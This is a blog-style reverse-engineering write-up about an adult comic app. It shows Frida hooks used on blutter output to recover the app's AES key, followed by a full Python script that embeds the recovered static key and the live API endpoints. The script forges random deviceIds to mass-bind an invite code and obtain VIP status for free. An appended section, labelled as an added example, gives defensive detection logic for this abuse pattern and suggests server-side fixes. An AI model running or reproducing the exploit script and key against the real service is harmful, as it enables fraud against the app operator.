A certain H app: bika

bika anime, dddd

I had worked on Flutter before, but there was no arm64 .so, so I gave up. Today a friend sent this one to me and I found it actually does ship arm64, so don't blame me for not holding back.

Fire up blutter; it parses Dart 2.19 without trouble.

The main work is reading the two files pp.txt and addNames.py: search for keywords and look for the entries that have addresses. This kind of app almost always uses AES for its encryption, so search for that directly, then Frida-hook the candidates one by one.

blutter generates a blutter_frida.js; add one line to it:

    const fn_addr = 0x7e1018;
    Interceptor.attach(libapp.add(fn_addr), {
        onEnter: function () {
            init(this.context);
            let objPtr = getArg(this.context, 0);
            const [tptr, cls, values] = getTaggedObjectValue(objPtr);
            console.log(`${cls.name}@${tptr.toString().slice(2)} =`, JSON.stringify(values, null, 2));
            // this is the line to add; then just look for keywords in the dump
            console.log('hexdump ==> '+hexdump(objPtr));
        }
    });

Hook it a few more times and it is basically done. After that it is guesswork: deviceId is presumably generated randomly on the client, so take a uuid, md5 it, keep the first 16 characters and send that; it works. Finally comes the crowd-pleaser, binding an invite code to get VIP, and it is in the bag.


    import requests, time, json, uuid, hashlib
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad

    code = 'YMMTK'
    # AES-ECB with the static key recovered from the app
    cipher = AES.new(b'525202f9149e061d', AES.MODE_ECB)

    def get_header():
        return {
            'user-agent': 'Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleDart/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17',
            'version': '1.0',
            'devicetype': 'android',
            'time': str(int(time.time() * 1000)),
            'host': 'api.bkrezwvjkc.com',
            'content-type': 'application/x-www-form-urlencoded',
        }

    def remove_pkcs7_padding(data: bytes, block_size: int = 16):
        if len(data) % block_size != 0:
            raise ValueError("Data length is not a multiple of the block size")

        padding_length = data[-1]
        if padding_length > block_size or padding_length <= 0:
            raise ValueError("Invalid padding detected")

        padding = data[-padding_length:]
        if any(byte != padding_length for byte in padding):
            raise ValueError("Inconsistent padding detected")

        return data[:-padding_length]

    def en(payload):
        # JSON -> PKCS7 pad -> AES-ECB -> hex string
        plaintext_bytes_padded = pad(json.dumps(payload).encode(), AES.block_size)
        return cipher.encrypt(plaintext_bytes_padded).hex()

    def de(s):
        a = cipher.decrypt(s)
        a = remove_pkcs7_padding(a)
        return json.loads(a.decode().replace('\r', '').replace('\\\\', '\\'))

    def device_id():
        # deviceId is client-chosen: md5 of a random uuid, first 16 hex chars
        random_uuid = uuid.uuid4()
        uuid_str = str(random_uuid)
        return hashlib.md5(uuid_str.encode()).hexdigest()[:16]

    def get_token():
        dev_id = device_id()
        payload = {"token": "", "deviceId": dev_id, "data": {"app_code": "ch2", "clipboard_text": "", "channel_code": "channel://zwkab1bk"}}
        result = requests.post('http://api.bkrezwvjkc.com/cxapi/system/info', headers=get_header(), data=en(payload))
        json_str = de(result.content)
        print(json_str)
        return json_str['data']['token']['token'], json_str['data']['token']['user_id'], dev_id

    def bind():
        token, uid, dev_id = get_token()
        payload = {'token': token + '_' + uid, 'deviceId': dev_id, 'data': {'code': code}}
        response = requests.post('http://api.bkrezwvjkc.com/cxapi/user/bindParent', headers=get_header(), data=en(payload))

        json_str = de(response.content)
        print(json_str)

    bind()
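The script above shows the underlying weakness: the deviceId is chosen entirely by the client (md5 of a random uuid, truncated to 16 hex characters), so the server cannot tell a forged device from a real one by looking at the value. What a backend can still see is the behaviour: a burst of freshly registered devices all binding the same invite code from one source within seconds. The following detection logic is an added example, not part of the original post or the app's own code. It runs over a constructed, hypothetical gateway log format (ISO timestamp, client IP, request path, deviceId, invite code); the two endpoint paths and the invite code are taken from the post, everything else, including the sample IPs and deviceIds, is assumed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines in a hypothetical gateway format (not the real service's logs).
# The first three devices register and bind within seconds of each other; the last one is a
# plausible legitimate user who registered hours before binding a code.
SAMPLE_LOG = """\
2024-01-01T10:00:00 203.0.113.7 /cxapi/system/info deviceId=3fa1c2d4e5b6a798 code=
2024-01-01T10:00:01 203.0.113.7 /cxapi/user/bindParent deviceId=3fa1c2d4e5b6a798 code=YMMTK
2024-01-01T10:00:02 203.0.113.7 /cxapi/system/info deviceId=9b8c7d6e5f4a3210 code=
2024-01-01T10:00:03 203.0.113.7 /cxapi/user/bindParent deviceId=9b8c7d6e5f4a3210 code=YMMTK
2024-01-01T10:00:04 203.0.113.7 /cxapi/system/info deviceId=0123456789abcdef code=
2024-01-01T10:00:05 203.0.113.7 /cxapi/user/bindParent deviceId=0123456789abcdef code=YMMTK
2024-01-01T09:00:00 198.51.100.20 /cxapi/system/info deviceId=fedcba9876543210 code=
2024-01-01T11:30:00 198.51.100.20 /cxapi/user/bindParent deviceId=fedcba9876543210 code=YMMTK
"""

# deviceId is always 16 lowercase hex chars in this app (md5 prefix), so anything else is malformed.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<path>\S+) deviceId=(?P<dev>[0-9a-f]{16}) code=(?P<code>\S*)$"
)

BIND_PATH = "/cxapi/user/bindParent"


def parse_log(text):
    """Parse log lines into event dicts; malformed lines are skipped rather than aborting the run."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["ts"] = datetime.fromisoformat(d["ts"])
        events.append(d)
    return events


def find_bind_abuse(events, max_device_age=timedelta(minutes=5), min_fresh_devices=3):
    """Return {(ip, code): [deviceIds]} for invite codes bound by >= min_fresh_devices
    distinct devices from the same IP, where each device was first seen at most
    max_device_age before its bind request (the register-then-bind-immediately pattern)."""
    # First time each deviceId appears anywhere in the log (registration or otherwise).
    first_seen = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        first_seen.setdefault(e["dev"], e["ts"])

    fresh_binds = defaultdict(set)  # (ip, code) -> set of freshly created deviceIds
    for e in events:
        if e["path"] != BIND_PATH or not e["code"]:
            continue
        age = e["ts"] - first_seen[e["dev"]]
        if age <= max_device_age:
            fresh_binds[(e["ip"], e["code"])].add(e["dev"])

    return {k: sorted(v) for k, v in fresh_binds.items() if len(v) >= min_fresh_devices}


if __name__ == "__main__":
    for (ip, code), devs in find_bind_abuse(parse_log(SAMPLE_LOG)).items():
        print(f"{ip} bound invite code {code} from {len(devs)} freshly registered devices: {devs}")
```

The thresholds are heuristics: three real friends installing the app and entering a code within five minutes of each other would trip the same rule, so treat a hit as a signal to review or rate-limit rather than an automatic ban. The structural fix is not to trust a client-supplied deviceId at all and to bind rewards to something the server can verify, such as a platform attestation or an account with completed verification.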